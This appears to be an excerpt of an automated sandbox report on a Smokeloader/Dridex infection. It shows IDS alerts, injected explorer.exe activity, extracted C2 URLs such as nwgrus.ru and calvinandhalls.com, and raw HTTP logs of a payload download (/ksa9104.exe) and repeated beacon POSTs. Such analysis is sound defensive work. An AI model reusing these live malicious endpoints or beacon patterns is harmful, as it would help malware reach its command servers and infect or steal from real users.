Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB87FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,8_2_00007FF7CB87FB34
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03272B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,9_2_03272B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03273ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,9_2_03273ED9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03271D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,9_2_03271D4A
Source: C:\Windows\explorer.exe | Code function: 11_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,11_2_001D30A8
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                Networking

                barindex
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49721 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49711 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49723 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49756 -> 190.98.23.157:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49753 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49719 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49718 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49727 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49720 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49740 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49717 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49732 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49725 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49752 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49739 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49737 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49713 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49722 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49712 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49714 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49754 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49729 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49738 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49735 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49733 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49730 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49728 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49758 -> 190.98.23.157:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49736 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49715 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49760 -> 190.98.23.157:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49716 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49724 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49726 -> 116.58.10.60:80
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49749 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49747 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49750 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49747 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49746 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49746 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49741 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49743 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49742 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49748 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49744 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49743 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49748 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49750 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49749 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49741 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49751 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49755 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49761 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49742 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49744 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49751 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49755 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49757 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49761 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49757 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49759 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49759 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49745 -> 23.145.40.162:443
                Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:49745 -> 23.145.40.162:443
                Source: C:\Windows\explorer.exe | Network Connect: 116.58.10.60 80
                Source: C:\Windows\explorer.exe | Network Connect: 190.98.23.157 80
                Source: C:\Windows\explorer.exe | Network Connect: 23.145.40.164 443
                Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 23.145.40.162 443
                Source: Malware configuration extractor | URLs: http://nwgrus.ru/tmp/index.php
                Source: Malware configuration extractor | URLs: http://tech-servers.in.net/tmp/index.php
                Source: Malware configuration extractor | URLs: http://unicea.ws/tmp/index.php
                Source: Joe Sandbox View | IP Address: 23.145.40.164
                Source: Joe Sandbox View | IP Address: 23.145.40.162
                Source: Joe Sandbox View | ASN Name: NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK
                Source: Joe Sandbox View | ASN Name: TelecommunicationcompanySuriname-TeleSurSR
                Source: Joe Sandbox View | ASN Name: SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
                Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.5:49741
                Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 23.145.40.164
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://nmesrodehsvre.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 181 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ircvpemvdgiy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 311 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://yqvikokvyrwyspvc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 171 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kersnljeyirt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 350 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://udbfyhiovnpjdsu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 223 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://gmhyvptkkbkcth.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 288 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kgiatertamgp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://oclbjgwufaxiagdw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 185 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://itcikyawgmc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 299 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://nphwxmrpgxfb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 354 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://calvinandhalls.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 501 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ygokuufxqffgxycc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://exeynemntnpasq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://rakvoqbrycri.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://yjslvmtqvthxoxo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: calvinandhalls.com
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bdxvqfpjlsvhpaof.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 121 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uotbaartbcqldrdx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 328 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kdulrgfaviysx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 141 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jlkucuylyof.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 278 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ejvnhlvhpussik.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 368 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vsagqcxnudryn.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 196 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fogsqjysaystoh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 359 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://verasvafreecifd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 220 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://eaxyrbajkqo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 304 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dfqwnqnvxbwcwpps.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 272 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ovvofxjtrlcblbe.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 174 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://khaxmqmrelincl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 201 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tuivtdfccoxjstqv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 184 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ktflshoikbglbj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 136 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xapousftkgr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 198 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xhvcwlrrfnr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 279 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://edyhjfoqqme.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ecpbasxejvhmni.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 173 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pklhudfcrpsm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 303 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bwdwojspdgtrj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 166 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://otxnyveihviep.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 257 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://btdksbvigeadnr.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 160 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xwykiojnclenqqi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 116 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nhtxkrllcfsfts.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 275 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xdbwevihetlvramf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 237 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kktprwryymhwgw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 363 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://waytjuqjooe.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 320 | Host: nwgrus.ru
                Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://seyshogepyribe.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 177 | Host: nwgrus.ru
